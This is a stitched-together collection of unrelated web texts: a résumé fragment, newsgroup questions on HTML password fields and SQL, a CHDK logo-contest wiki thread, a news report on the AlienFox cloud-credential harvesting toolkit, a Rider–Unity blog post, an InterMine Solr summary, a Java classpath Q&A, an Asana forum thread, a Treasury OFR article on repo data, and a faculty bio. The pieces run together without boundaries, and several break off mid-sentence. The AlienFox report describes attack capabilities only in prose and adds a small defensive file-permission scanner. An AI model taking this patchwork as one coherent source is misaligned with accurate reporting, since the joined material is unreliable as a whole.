Implemented version control and basic unit testing. Integrated Facebook into the site using the PHP client. Used Bronto for our email communications through Drupal. Built API integration with Authorize.net for credit card processing and secure credit card storage.
- Custom review system for users to rate the dresses they have rented.
- Implemented Subversion for version control and managed roll-outs.
- Created a BIRT server for sales reporting.
- Implemented functional testing using PHPUnit, Selenium and Hudson.
- Initiated a Symfony project for testing converting the site to MVC.

Web Developer, NightAgency

Built interactive sites for a variety of clients including Hanes, Soft Scrub and Purex. The majority of development was done using PHP. Frameworks included CakePHP and Zend Framework. Worked with online services such as Amazon S3 for storage. Rapid development environment for clients with strict deadlines for product launches. Built a localized web site with both French and English versions for the Canadian site using a single code base. Used AMF to communicate between the Flash client and back-end server. Amazon S3 used for image storage. Integrated Disney's custom swear filter using SOAP to filter submissions.
What app will keep my typing in a file that I can access if I am timed out? This happens to me when using web forms and when typing iTunes comments. I do "Select All" then "Copy" as I go, but sometimes that last 150 words disappear when I click the "Submit" button. Thanks for your suggestions, Earl Williams, Surrey, British Columbia. PS. I have Copy/Paste is it tracking paragraphs or just listing vocab?

RadioDays <email@example.com> wrote:
> What app will keep my typing in a file that I can access if I am timed
> out. This happens to me when using web forms and when typing iTunes
> comments. I do "Select All" then "Copy" as I go but sometimes that
> last 150 words disappear when I click the "Submit" button. Thanks
> for your suggestions, Earl Williams, Surrey, British Columbia PS. I
> have Copy/Paste is it tracking paragraphs or just listing vocab?

"Harry?" Ron's voice was a mere whisper. "Do you smell something ... burning?" - Harry Potter and the Odor of the Phoenix

Converting numeric data type to text data type

Hi, I would like to convert a dollar amount ($1,500) to represent Fifteen hundred dollars and 00/100 cents only for SQL reporting purposes. Is this possible, and can I incorporate the statement into an existing left outer join query? Thanks in advance,

[posted and mailed, please reply in news] Gavin (firstname.lastname@example.org) writes:
> I would like to convert a dollar amount ($1,500) to represent Fifteen
> hundred dollars and 00/100 cents only for SQL reporting purposes. Is
> this possible and can I incorporate the statement into an existing
> left outer join query.
If it is for r...

Switch input field from TYPE=TEXT to TYPE=PASSWORD

Hi everyone, I have a page with a login box. Because of lack of space, instead of labels I put the descriptive text in the input fields (so the username input says 'username', and the password input says 'password'). The password field however, once it does have the focus, should mask its input.
Now what I've done, and it works in Firefox, is onfocus="this.type='password'; this.value='';". (It's a bit more complex than that, but this is essentially it). Unfortunately IE complains. Is there any way to perform this trick in IE without showing and hidin...

Joining Text Type with Memo Type = Funny Characters

Hi, when I am joining on a column of Text type with one of Memo type, the resulting entry has funny Chinese characters! Has anyone else encountered this before? Is there a cure??

Funny characters and Chinese characters are completely different. I have no idea what "Memo Type" is, but did you check the keyboard language property on the control?
> when i am joining on a Column of Text Type with one of Memo type
> the resulting entry has funny chinese characters!
> Has anyone else encountered this before?

Script to change from type=password to type=text, minor bug repair

My form has a password field, and I was wanting to show a text value by default, then when the visitor clicks on it let it change to a
I must confess that this was over my head, so I searched online and found a freebie script. I had to make some modifications to the original to work out a few bugs, but I'm having one bug that I can't
If you click on the field, it blanks the value just fine. And when you click away while leaving the field empty, then it plugs the word "Password" back in just fine, too. But then when you click back into

Checking a form input tag type works only for type text... not others... why?

I have a form called "ourTestForm". It's a test form - nothing special - it contains five input tags - they are named one, two, three, four and five. The input tags are of type text, text, radio, checkbox and select. When I run the following code, it correctly reports "text" (for the input tag named "one") but it reports (alerts) input tag four as being "undefined". The same happens for any input tag that is not of type "text". How come? How can I fix it? I get type mismatch errors sometimes.
Why does Access think it knows what data type a text box control is? Runtime error 13 - type mismatch. I get the above error when I create a text box control on a form named [UserID] and I run the following code in a sub on that same form...

If DLookup("[UserID]", "tblUsers", "[UserID]=Forms!Form10!UserID")

tblUsers has a 6-char text field in it named [UserID]. What can Access be thinking to tell me the data in the textbox and the data in the table field cannot be compared because of incompatible data types? This has always bugged me about Access. I believe it should be possible to compare the string in Forms!Form10!UserID ...

app type?

Can I somehow get a listing of the applications on my disk, classified
In article <email@example.com>, Philo D
> Can I somehow get a listing of the applications on my disk, classified
> Application (Intel)
> Application (PowerPC)
> Application (Universal)
Answering my own question: System Profiler > Software > Applications, sort by "Kind" column
In <firstname.lastname@example.org>, Ph...

Replace text in text box with innerHTML type thing

Currently, I am having a problem replacing the value of an input box with something else using the innerHTML thing. Right now I have and a link with and the text box like <INPUT TYPE="TEXT" NAME="WHATEVER" id="WHATEVER" VALUE="TESTING" and I am tryi...

Changing table cell between plain text and INPUT TYPE=TEXT control

I'd like to set up a table cell such that the contents display as plain text until the mouse hovers over the cell, and then it changes to an INPUT TYPE=TEXT control, so I can edit the content.
achieve this, but before I start, is there any overarching reason why this wouldn't work? I anticipate placing the plain text and the input area in separate DIVs, and making the
appear alternately, depending on where the mouse pointer is. The page is for my own use, and perhaps one or two colleagues, so we
I've got couple of sketches for a logo on my table, but had no time to get back to them... will happen this year - promise! (writing at 2am...) Update (2007-11-17 c.e.): Rumor has it that some people are getting antsy for this logo contest to end. :-) To tell the truth, I was hoping there'd be lots more of you graphic-artists out there just chomping at the bit to marvel us with your stunning submissions. Like five entries is not a huge number of them, ya know? I like some of the ideas so far but I don't think I'm the one to vote on it and choose, and I'm not sure how to hold an open vote by all contributors/viewers. I kind of thought that since CHDK is GrAnd's main effort (and even his suggestion to get some logo submissions), he might be the one to finally say, "I like that one! I'll use it." Or, "Screw them all! My original one is still best!" :-) (plus I don't know how to change the logo and I probably don't have the user permits for it) So .... I'm kinda thinking that ... maybe this page should just stay up and let it run? Then there's always a place for people to submit possible logos. That way if at any time GrAnd likes one of them, he can just go ahead and grab one. Or swap it out for another if something else catches his eye? Maybe a link titled "Logo Submissions" could just be added to the Feedback section on the main page and the "contest" in the News section finally moved off. Then anytime someone could submit a new idea. One will eventually stick. Even Coke changed their logo over the years. Surely we have at least that much freedom. :-) Have not been here for a while - so I was quite astonished (and honoured of course) to see my (draft of a) logo made it to the top of the page (and at least to two fora.) Since I was asked: I explicitly permit the use of the unaltered logo(s) for every non-commercial purpose concerning CHDK. Feel free to suggest improvements or modifications. 
[cosmograph] - Well, maybe it's just my monitor, the dark grays to black on it are strongly bunched up on that end. Making it very difficult to see the words on the dark-gray dial. Might be nice if the letters on the CHDK dial were more legible. And as you can see, I always like purty colors on the ones I sent for examples. :-) I did borrow your logo today and brightened it up some just to see what would happen, but didn't take the time to upload them. (one of course has lots of purty colors on it. I know, uck) - Congrats on winning btw! But don't get too comfortable on that throne, I might finally come up with something by spring that I think is worth sending as an official submission. :-) [mr. anon] As suggested, two brighter versions: - I'd like to see the picture even brighter. The current variant looks good on LCD monitors with (S)IPS panels, but is still hardly readable on PVA/MVA panels, since those panels are less readable in dark colors. As I do not have the original image I've tried to change yours by raising the brightness of the dial area (so, the quality is a little bit degraded): - [--GrAnd 07:01, 30 November 2007 (UTC)] - Ah, that's MUCH better! Thanks! Looks nice here! - But I had a momentary lapse of I-need-lotsa-colors, so I came up with this'n, playing off of your camera-dial idea (again). ... :) - I know, I know, you folks are crazy about that red and black/gray stuff, so I at least made the main logo letters in those colors. :) It might look a little tacky compared to yours, but if anyone wants to expound on this, I saved the bare-bones vectors in a file so I can flip colors and bevels and things around. (And I wanted to figure out how to use all those cool layout tools I've never used before. :) Okay, I'll quit butting in after this, I promise.
:X GrAnd suggested that people submit some ideas for logos; the only requirement is they have to fit a 266x75 format for Wikia's Quartz skin, or 135x155 for all other skins; 155x155 may be used but is not recommended (* see GrAnd's note below). It's probably good to also keep them limited to the PNG filetype so you can upload them to the Wikia and make them easier to view and use. Share them here or in the discussion section (link above). Some samples were posted there for a starter. Anyway, I was fooling around with my PL32 editor and came up with this. It's not really good. As I said, I was just fooling around playing with some of PL32's editing tools. But I thought it might act as an example for others, maybe of what NOT to do. :-) I thought taking elements from different parts of CHDK features might be made into one somehow. Surely this can inspire anyone to do better. :-) This one covered the on-screen-display elements like the histograms (OSD), scripting (motion detection and intervalometer lightning photography), the fun of the built-in games, and the customizable Grid feature. (hmm... when uploading, wikia threw some pixels in new places, oh well, it's just an example) - Actually, wiki uses two different logos depending on the skin used. :) From wiki-help: - The logo for the Quartz skin has to be no more than 266 pixels wide and 75 pixels tall, and should be saved in the .png format. - The logo size for all other skins has to be no more than 135 pixels wide and 155 pixels tall, and should be saved in the .png format. - But, the second one can be 155x155, although 135x155 is recommended. --GrAnd 07:02, 17 October 2007 (UTC) - Thanks for the clarification GrAnd, it helps to give folks a few more formats to fit their layout into. I'll leave mine as-is and re-do it if ever needed, but it's just an example. :-) [mr. anon] Tried to visualize CHDK as an enhancement of a jog-dial resembling the original one. - Hmm... I like this idea!
But I think it might be nicer if CHDK was a little logo right on the dial, maybe even shown at an odd angle so it's not obvious at first, then with one of those image-insert blowups like in a user manual, pointing to it and showing it enlarged. You might like to have it be CHDK (+RAW), since RAW is such a small subset of its many functions. RAW just don't tell the story and so many other cameras already have RAW, missing the impact of how special it is. CHDK is more like having a whole extra dial on the camera. :-) I like the concept though. This is the problem I had, trying to convey all that's in CHDK in a simple logo. I almost thought of using a swiss-army knife theme. With each blade, corkscrew, scissors, etc. labeled for one of its functions. Then I was back to "too complex" for a simple and easy to recognize logo. Anyway, nice idea! Too bad a logo can't be an animated GIF or SWF, then we could have it like a transformers-cartoon animation, a simple camera falling into bits and reassembling itself into some mighty super-robot camera. We'll eventually need a CHDK super-hero character out of this, he comes along and saves us from all those paltry camera-company offerings. :-) [mr. anon] Second version without any visual reference to the features of CHDK.(I fully agree that CHDK is more than RAW). - Hmm... I remember seeing an earlier one, where you did 2 dials, one with CHDK's features listed on it. I think I liked that better, but was going to suggest making the dial-sectors of CHDK's options into brighter colors, and making the original camera's mode-dial the dim one. I'm not the one that's going to be voting on these things, but I did like that concept better. What if you did the above, but just with CHDK features listed in colorful sectors? Forget about the camera's mode-dial options. It's been REPLACED!! :-) - [mr. 
anon] combination of a typical canon and the text, just an idea, no time to try different fonts http://free.pages.at/panther06/chdk-logo22-s.jpg So I decided to give something back. I actually made three but this one I like the most.
A new modular toolkit known as 'AlienFox' allows threat actors to scan for misconfigured servers to steal authentication secrets and credentials for cloud-based email services. The toolkit is sold to cybercriminals via a private Telegram channel, which has become a typical funnel for transactions among malware authors and hackers. Researchers at SentinelLabs who analyzed AlienFox report that the toolset targets common misconfigurations in popular services like online hosting frameworks, such as Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress. The analysts have identified three versions of AlienFox, indicating that the author of the toolkit is actively developing and improving the malicious tool.

AlienFox targets your secrets

AlienFox is a modular toolset comprising various custom tools and modified open-source utilities created by different authors. Threat actors use AlienFox to collect lists of misconfigured cloud endpoints from security scanning platforms like LeakIX and SecurityTrails. Then, AlienFox uses data-extraction scripts to search the misconfigured servers for sensitive configuration files commonly used to store secrets, such as API keys, account credentials, and authentication tokens. The targeted secrets belong to cloud-based email platforms, including 1and1, AWS, Bluemail, Exotel, Google Workspace, Mailgun, Mandrill, Nexmo, Office365, OneSignal, Plivo, Sendgrid, Sendinblue, Sparkpostmail, Tokbox, Twilio, Zimbra, and Zoho. The toolkit also includes separate scripts to establish persistence and escalate privileges on vulnerable servers.

An evolving toolset

SentinelLabs reports that the earliest version found in the wild is AlienFox v2, which focuses on web server configuration and environment file extraction.
Next, the malware parses the files for credentials and tests them on the targeted server, attempting to SSH in using the Paramiko Python library. AlienFox v2 also contains a script (awses.py) that automates sending and receiving messages on AWS SES (Simple Email Service) and applies elevated privilege persistence to the threat actor's AWS account. Finally, the second version of AlienFox features an exploit for CVE-2022-31279, a deserialization vulnerability in the Laravel PHP Framework.

AlienFox v3 brought automated key and secret extraction from Laravel environments, while stolen data now featured tags indicating the harvesting method used. Most notably, the third version of the kit introduced better performance, now featuring initialization variables, Python classes with modular functions, and process threading.

The latest version of AlienFox is v4, which features better code and script organization and an expanded targeting scope. More specifically, the fourth version of the malware has added WordPress, Joomla, Drupal, Prestashop, Magento, and Opencart targeting, an Amazon.com retail site account checker, and an automated cryptocurrency wallet seed cracker for Bitcoin and Ethereum. The new "wallet cracking" scripts indicate that the developer of AlienFox wants to expand the clientele for the toolset, or to enrich its capabilities to secure subscription renewals from existing customers.

To protect against this evolving threat, admins must ensure that their server configuration is set with the proper access controls and file permissions, and that unnecessary services are removed. Additionally, implementing MFA (multi-factor authentication) and monitoring for any unusual or suspicious activity on accounts can help stop intrusions early.
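The hardening advice in the last paragraph (correct file permissions on configuration files) can be made concrete. The following is an illustrative sketch, not part of SentinelLabs' report: a small Python scan that flags sensitive files, such as the .env files AlienFox harvests, that are readable by group or other users. The file-name list is a hypothetical example; real deployments would extend it.

```python
import os
import stat

# Hypothetical list of configuration files that commonly hold secrets.
SENSITIVE_NAMES = {".env", "wp-config.php", "config.php"}

def find_exposed_files(root):
    """Return paths of sensitive files readable by group or other users."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in SENSITIVE_NAMES:
                path = os.path.join(dirpath, name)
                mode = os.stat(path).st_mode
                # Flag anything beyond owner-only read access.
                if mode & (stat.S_IRGRP | stat.S_IROTH):
                    exposed.append(path)
    return exposed
```

Run against a web root, anything the scan reports is a candidate for chmod 600 and a credential rotation, since files like these are exactly what AlienFox's data-extraction scripts look for.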
Integrating Rider 2018.2 and the Unity Editor

Rider 2018.1 introduced deep integration with the Unity Editor, allowing you to run unit tests, view Unity console log entries and control play mode, all without leaving Rider. In our third post looking at Rider 2018.2 and Unity, we’ll look at what’s new in Editor integration. In this series:
- Unity Package Explorer
- Assembly Definition Files
- Unity Editor integration updates
- Unity specific code analysis

Installation and first use

The easiest way to get started with Rider and Unity is to load an existing solution, at which point we’ll automatically install a plugin into your Unity project. When you switch back to Unity, the plugin initialises, sets Rider as the default external editor and you’re all set. The plugin makes sure the generated C# projects are compatible with Rider, and will set up the inter-process communication that lets Rider run tests, view logs and so on. But there’s a little bit of a chicken and egg scenario here. What happens when there aren’t any solution files? Unity generates these files, and makes sure they’re up to date when you double click a C# file. But they’re not usually checked into source control. So how do you open a project without solution files? Of course, once Rider is set as the default external editor in Unity, you can double click a C# file and Unity will open Rider for you. But we also received feedback that users were trying to open a Unity project using Rider’s Open Folder feature. This is mostly intended for working with web files, and not C# projects, which require MSBuild files. Without important context from project files (e.g. target framework version, references, etc.) Rider can’t show the C# features we all know and love, such as code completion or inspections, and this was understandably leaving users frustrated. The good news is that we’ve addressed this in Rider 2018.2!
If you try and open a fresh Unity project as a folder, Rider will now notify you that Unity and C# functionality is unavailable until the project is reopened correctly. It will also prompt you to install the plugin. Once you’ve clicked the action link, Rider will install the plugin and then prompt you to switch back to Unity, at which point Unity will load the plugin, set the default external editor and generate the project files. You can now reload the solution correctly. (Of course, you can also set Rider as the default external editor in Unity’s preferences – recent versions of Unity will recognise when Rider is installed and automatically add it to the list of available editors. Once selected, double clicking a C# file will generate the solution, open it in Rider, and then the plugin is automatically installed.)

One of the cool features of Rider’s deep Unity integration is the ability to capture Unity’s Console log messages and bring them into Rider’s UI, with parsed, clickable stack traces. We’ve made a couple of nice updates in this release. Firstly, we’ve added a text filter. Just start typing in the search field at the bottom of the window, and we’ll narrow down the list by only showing matching items. Hit enter to change focus to the list and navigate with the cursor keys. And if there are too many log entries? Well, you can now collapse similar items, using the toggle button in the toolbar. Once selected, Rider will only show a single item, with the number of merged items shown in brackets at the end of the message. And finally, we can now open editor and player log files in Rider’s editor. Simply open the options menu in the Unity log viewer tool window (the cog in the top right of the tool window) and select Open Unity Editor Log or Open Unity Editor Player Log. Note that these log files are the Unity editor’s own logs, or logs from a standalone player, rather than the messages logged to Unity’s Console.
Working with class libraries

With the advent of Assembly Definition Files, Unity now has a story for splitting a solution up into separate assemblies, with the architectural and build time advantages this gives. But we know that there are still a lot of Unity developers who create a separate solution for class libraries that are then added as binary references to a Unity project. Wouldn’t it be nice if all those lovely Unity project integration features were available to these class library projects? Well, now they are! If you have a class library project, with solution files living in the root of the Unity project (in the same location as the generated solution file), Rider will now enable the same rich integration features for class library projects. This means you’ll get the log viewer, the play/pause/step buttons to control Unity’s play mode, and also automatic Attach to Unity Editor and Attach to Unity Editor and Play run configurations, to make it very easy to attach the debugger to the Unity editor. And best of all, it will work even if you have the class library and the generated solutions open at the same time!

Control when to reload assemblies

Unity is designed to have a tight feedback loop. Whenever a source file changes, the underlying assemblies are recompiled and reloaded. This works great for immediate feedback, but can be annoying when you’re in play mode – you’re busy play testing a scenario, and a modified file causes everything to reload and lose state. It can be very frustrating. Unity 2018.2 added an option in the General preferences page to control what happens when scripts change during play mode. We liked it so much, we’ve brought it to earlier versions of Unity. The Rider page in Unity’s preferences dialog will now allow you to prevent assembly reloads during play mode, or reschedule them for after play mode, or to stop play mode straight away and recompile.
This is very useful when used together with Rider’s background refresh, which notifies Unity when a file has changed, causing a recompile. And you’ll also be pleased to hear that this release of Rider continues to fine tune the background refresh, making it a little less aggressive about when it causes a recompile. Even better, the implementation for the lock assemblies feature came from an external contribution (yes, the Unity support is open source and has up-for-grabs issues!). Congratulations and thanks to Jurjen Biewenga! 🎉 Those are the main new features for editor integration in Rider 2018.2, but that’s not everything. There are also a few more minor updates, although some are no less important. For example: - Rider now understands references added in csc.rsp files – Roslyn compiler response files. When generating the project files, Rider has previously looked for references and C# defines from mcs.rsp, smcs.rsp and gmcs.rsp files and added them to the project file. This release adds similar support for csc.rsp files used by the latest C# compiler. - We’ve reduced the number of times that generated project files are written to disk. This means that we reload the project less frequently, and although Rider is very quick at reloading (and doesn’t prompt you!), doing no work at all is always faster! It also makes much more of a difference for projects using Unity packages, which can end up having tens or even over a hundred projects. - We’ve reduced the time taken when initialising the Unity plugin, to help improve that feedback cycle. We’ll be doing more work on this in coming releases. - And finally, we’ve fixed a few other bugs and exceptions (see the full list for 2018.2, 2018.2.1 and 2018.2.2), the most important of which was a nasty crash with older versions of Unity.
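For reference, a compiler response file is just a list of compiler arguments, one per line, that the compiler picks up alongside the command line. A minimal csc.rsp might look like this (the dll path and define symbol below are made-up examples, not anything Rider or Unity ships):

```
-r:Assets/Plugins/Newtonsoft.Json.dll
-define:ENABLE_LOGGING
```

Rider reads these entries when generating the project files, so references and defines declared this way show up in code completion and inspections.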
Other highlights include once again correctly setting LangVersion on older versions of Unity, disabling the plugin in batch mode, and no longer unnecessarily installing the plugin every time you open a project. Sorry about that! As you can see, we’ve put a lot of effort into integrating Rider well with Unity, and we’re not done yet. In our next post, we’ll take a look at the new Unity specific inspections in Rider 2018.2. If you have any suggestions for other features you’d like to see in Rider, please let us know. And in the meantime, please download Rider 2018.2 today, and give it a go (and don’t forget about the 30 day trial version)!
Currently InterMine uses the Apache Lucene (v3.0.2) library to index the data and provide a keyword-style search over all data. The goal of this project is to introduce Apache Solr in InterMine so that indexing and searching can happen even quicker. Unlike Lucene, which is a library, Apache Solr is a separate server application, similar to a database server. We set up and configure Solr (v7.2.1) independently from the application and use Solr clients to communicate between the application and the Solr instance. Here, SolrJ (v7.2.1), a Java client for Solr, is used to communicate between InterMine and Solr. We also removed the bobo facet library, which was used with Lucene, since Solr itself provides faceted search. The implementation has been designed so that InterMine is not heavily coupled with Solr. If you want to change your search engine to something else in the future, you just have to provide different implementations of the defined interfaces. Currently the search index and the autocomplete index processes use Solr to index the data. The index time has improved significantly compared to previous indexing times. For example, currently FlyMine takes around 1900 seconds (32 mins) to index the data, but with Solr it takes only 1250 seconds (21 mins), which is a 34% reduction in time. Query time has also improved with Solr: a query of “*:*” in FlyMine used to take around 30-40 seconds, but with Solr it takes less than 1 second. Previously with Lucene, the indexed data had to be retrieved from the database during the first search after starting the webapp. This took some time, but with Solr this is not the case and the results are returned instantly. In addition to the above, two web services have been implemented. A Facet service has been implemented which will return only the facet counts for a particular query rather than returning all the results.
The other web service is the Facet List service, which is similar to the previous one but returns all the facets available in a mine. It is useful when you want to know all the facets in a mine before you run an actual search. All these changes are made against the InterMine 2.0 version. These changes will be included in an InterMine release in the near future, but those who want to try them immediately can check out this branch on GitHub and follow these instructions. All these changes are tested with Apache Solr (v7.2.1).
- Github changes : https://github.com/intermine/intermine/commits/gradle-search?author=arunans23
- Setup document : https://docs.google.com/document/d/10B-MbzF5HIpJjkNp-UAICbhVkVJnjDD6CnkbcRYXxH4/edit?usp=sharing
- Detailed technical doc: https://docs.google.com/document/d/1V1Hbm1o3nk3rOv3j7PLsk-EL9mDKyAD4NitwIDA1UGw/edit?usp=sharing
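At bottom, a facet-counts-only request like the one the Facet service makes boils down to a handful of standard Solr query parameters. The sketch below just assembles such a request URL with the standard library; only the q, rows, facet, and facet.field parameter names are standard Solr — the host, core name, and facet field are invented for illustration, and this is not InterMine's actual implementation (which uses SolrJ):

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Sketch of the kind of request a facet-counts-only service makes:
// rows=0 asks Solr to return no documents, only the facet counts.
public class FacetQueryExample {
    static String facetUrl(String solrBase, String query, String facetField) {
        return solrBase + "/select"
                + "?q=" + URLEncoder.encode(query, StandardCharsets.UTF_8)
                + "&rows=0"            // skip the documents, keep the counts
                + "&facet=true"
                + "&facet.field=" + URLEncoder.encode(facetField, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Hypothetical local Solr core; real deployment details will differ.
        System.out.println(facetUrl("http://localhost:8983/solr/flymine", "*:*", "Category"));
        // → http://localhost:8983/solr/flymine/select?q=*%3A*&rows=0&facet=true&facet.field=Category
    }
}
```

With SolrJ the same parameters are set on a query object rather than a raw URL, but the shape of the request is the same.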
Run java application from command line with external jar files
I have an external jar file (with a package structure), which contains the main class, and I can run the app from the command line like this: java -jar example.jar
But I still have another test.class file outside this jar file, and some classes inside this jar file will invoke the methods in test.class. How can I specify the test.class file to be used by the jar file on the command line? I have tried many ways; it always shows: NoClassDefFoundError for test.class
NB: the test.class file also uses class files in the example.jar file, and has its own package structure. I know I can put them together in one jar file, but unfortunately I need to keep the test.class file separate.
Read up on Classpaths in the Oracle tutorial. If the class is in the bin directory: java -cp xxx.jar;bin pck1.pck2.MainClass
If the class is in the current directory: java -cp xxx.jar;. pck1.pck2.MainClass
and so on... More info in the manual, please read it at least one time... ;-)
Sorry, not in a workspace, there is no bin directory. Assume the test.class file is in the same folder as the example.jar file.
"Assume test.class file is in the same folder with example.jar file" How about you 'pick up the ball & run with it' rather than try to get us to code this to your exact specification?
I think I forgot to mention one important thing: the test.class also uses the class files in example.jar, and has its own package structure too... and do you use ; to separate classpath entries when searching for class files?
Seriously, how hard is java.exe -?
@Aubin I was asking LifeOnCodes lol. This question could have been summed up for him if he had just done java.exe -?.
It works. I want to stress that the options -cp xxx.jar;. should come before the class containing the main method, otherwise the annoying "Error: Could not find or load main class" appears.
On a Linux system, compile and run a Java program along with external JARs:
javac -cp </path/jar1>:<path/jar2>:<path/jar3> MainClass.java

If the compiler throws a deprecation warning, you can recompile with the -Xlint:deprecation argument:

javac -Xlint:deprecation -cp </path/jar1>:<path/jar2>:<path/jar3> MainClass.java

Finally, run the Java program:

java -cp </path/jar1>:<path/jar2>:<path/jar3>:. MainClass

If you want to run the Java process in the background, you can use nohup:

nohup java -cp </path/jar1>:<path/jar2>:<path/jar3>:. MainClass &

You can use the following commands to run a Java main class or a jar file:

java -Djava.ext.dirs=E:\lib E:\Executable\MyMainClass
java -Djava.ext.dirs=E:\lib E:\Executable\purging.jar
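When a NoClassDefFoundError like the one above persists, it can help to dump the classpath the JVM actually received. This small diagnostic class (purely illustrative, not part of the question's code) prints each entry, so you can check whether the directory containing test.class really made it into -cp:

```java
// Prints the effective classpath, entry by entry.
public class ClasspathCheck {
    public static void main(String[] args) {
        String cp = System.getProperty("java.class.path");
        // The path separator is ';' on Windows and ':' on Linux/macOS.
        String sep = System.getProperty("path.separator");
        System.out.println("classpath: " + cp);
        for (String entry : cp.split(java.util.regex.Pattern.quote(sep))) {
            System.out.println("  entry: " + entry);
        }
    }
}
```

Run it with the same -cp you pass to your real main class, e.g. java -cp example.jar;. ClasspathCheck on Windows, and confirm each expected entry appears.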
I just started using Asana and I was wondering how to organize workflow
We have around 10 people in the team and not all of them are responsible for all the projects. Sometimes one project includes 2 members and over time needs another 2. How do you usually do it? Do you add a new team for a new project, or do you create one big team for your company (10 people) and create projects within the team, inviting particular team members to a specific project?
It depends quite a bit on how many projects you intend to run. Your goal should probably be to keep things easy to find and hit the sweet spot: enough teams that no single team holds far too many projects, but not 20 teams with 2 projects in each. Except for collaboration, I find the main purpose of Teams to be structuring your projects. We’re a bit over a hundred people and never create a new Team unless it’s a major initiative that requires 5 or more Projects to be created within the team. To visualize, I recommend just writing up some made-up teams and projects in a Sheet and trying to see what a good combo could be. A bit of advice, though - it’s a lot easier to create new teams than to remove old teams.
That’s a great guide! Although I don’t personally fully agree with having so many teams in all organizations. We try to avoid teams that exist only to group people. Our vision is that any team should be connected to our organization elsewhere and to things you might want a report on. Otherwise we try to manage one-on-ones and similar in the team where they belong, such as your department or, if cross-functional, where it makes the most sense. We’ve scaled from 10 people to 130 in 3-4 years and the number of teams created made a mess. As previously mentioned, I’d much rather expand on teams as they are needed instead of getting put in a situation where you have too many teams.
I am happy to find this question because I have been wondering the same.
While I appreciate your feedback, your context is more for in-house teams. What about an independent entrepreneur managing multiple client projects? I could add them all under My Company Team, but since these stakeholders are technically clients, I’ve been creating the projects under their own Teams to create structure and boundaries. Maybe I answered my own question. By having each client with its own team, I can then add those on my actual team (say, hired under my company name) under my Company Team projects, as well as organize multiple projects under each of my Client Teams, as I believe in time we’ll grow to such a size. I might have answered my own question! LOL but I am open to feedback here in the community. hehe yes you did answer your own question With clients it really depends on your use case. In our company we also had the problem of how this would best be set up and we have made a lot of changes over the years. In my opinion it really depends on what you prefer, how much work per client is involved, and how much (if any) access you want your clients to have. yass! i hear ya. I am thinking that as our projects are small and teams are just starting to develop, we can get away with client access within their own teams. I am keen to take a look at your blog about how much access to give them. That was also in the back of my mind. happy to share as things progress. Right now just trying to onboard and immerse people into the teams as most are new to the app. I wonder if there is a great onboarding tutorial here that we can piggy back on?
Capital market activities (repo, market making…): regulatory impacts and future trends - Economic and monetary challenges

Financial Stability Risks in SFTs: Start with the data gaps
By Richard Berner - Director, Office of Financial Research, U.S. Department of Treasury

After the financial crisis, the Financial Stability Board recommended oversight of securities financing transactions (SFTs), including markets for repos (repurchase agreements), securities lending, and margin lending activities. The crisis revealed three types of vulnerabilities in these markets: (1) leverage and liquidity transformation risks by market intermediaries, (2) weaknesses in the market infrastructure, and (3) the risk of runs and asset fire sales. Regulators have taken important steps to address some of these vulnerabilities, but more remains to be done. For example, no comprehensive mitigant is available for the significant risk of fire sales. In addition, a lack of good data prevents us from adequately monitoring these markets, identifying new trends, and assessing their vulnerabilities. To help address these gaps, the OFR and the U.S. Federal Reserve System launched data collection pilots this past year with input from the U.S. Securities and Exchange Commission. The first pilot, which is complete, focused on the U.S. bilateral repo market. A second, ongoing pilot is focusing on securities lending. Nine large bank holding companies voluntarily provided snapshots of their bilateral repo activity at the end of three reporting days in the first quarter of 2015. Over those days, participating dealers lent an average of $1.6 trillion and borrowed an average of $1 trillion. These trades accounted for about half of the total U.S. bilateral repo market on those days. We found that about 81 percent of the repo trades and about 61 percent of the reverse repo trades, in which dealers provide cash to their clients, used U.S. government securities as collateral.
Equities backed 15 percent of the repo and 21 percent of the reverse repo trades by market value. The OFR recently published a research brief discussing the findings in more detail. The pilot was limited in scope, excluding smaller market participants, cross-border repo activities, and trades outside the United States. For these reasons, the results do not offer a complete picture of market interconnectedness or allow us to track any migration of activities away from the primary dealers that participated in the pilot. On the other hand, the pilot uncovered some key requirements for future data collections. First, common data standards are essential. For example, the lack of standardized counterparty information makes analyzing market interconnectedness difficult for market supervisors and market participants. Although the use of a legal entity identifier (LEI) would help to resolve this issue, the pilot found that adoption of the LEI standard among repo market participants is low. Second, participating firms must consistently identify entities by industry sector to assure data quality. Third, the pilot found the need for a consistent and uniform approach to grouping collateral securities to analyze the U.S. SFT market. Fourth, the internal reporting systems of firms in SFT markets should be able to produce granular data at the enterprise level to track risk within the firm and across the financial system. The pilot found that internal systems are disjointed, presenting problems for regulators and the firm’s own risk monitoring efforts. For example, data elements specific to a trade might be kept in one trading system while counterparty data might be kept in a separate system. We will apply these valuable lessons during permanent data collections in collaboration with the Fed, the SEC, and our global counterparts. In these collections, we will require the use of data standards such as LEI.
We will also collaborate in other data collection efforts in the United States and Europe. These efforts will be consistent with the principles in the Financial Stability Board’s multi-year plan on global SFT data collection and aggregation. Our goal is to promote coordination on data standards and cross-border sharing. Success will give us a clearer picture of the global SFT market and developments that may present emerging risks to financial stability.
Sheng Li is an artificial intelligence researcher and his long-term goal is to develop intelligent systems in open and dynamic environments. Li joined the School of Data Science as an Assistant Professor in 2022. Prior to the University of Virginia, Li was an Assistant Professor of Computer Science at the University of Georgia from 2018 to 2022 and a Data Scientist at Adobe Research from 2017 to 2018. He directs the Reasoning and Knowledge Discovery Laboratory. Li's research interests include trustworthy representation learning (e.g., robustness, fairness, causality, transferability), visual intelligence, user modeling, natural language understanding, bioinformatics, and biomedical informatics. Li has published extensively in major peer-reviewed journals and conferences. He has served as associate editor of seven journals, including IEEE Transactions on Neural Networks and Learning Systems, IEEE Transactions on Circuits and Systems for Video Technology, and IEEE Computational Intelligence Magazine, and has also served as Area Chair for NeurIPS and ICLR. Li holds a Ph.D. in Computer Engineering from Northeastern University, and an M.S. in Information Security and a B.S. in Computer Science from Nanjing University of Posts and Telecommunications.

Ph.D., Computer Engineering, Northeastern University
M.S., Information Security, Nanjing University of Posts and Telecommunications
B.S., Computer Science, Nanjing University of Posts and Telecommunications

Areas of Practice: Visual Scene Understanding, Bioinformatics, Recommender Systems
Data Science Domains: Data Mining, Machine Learning, Deep Learning

Shi, W., Zhu, R., and Li, S. (2022). Pairwise Adversarial Training for Unsupervised Class-imbalanced Domain Adaptation. 28th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining
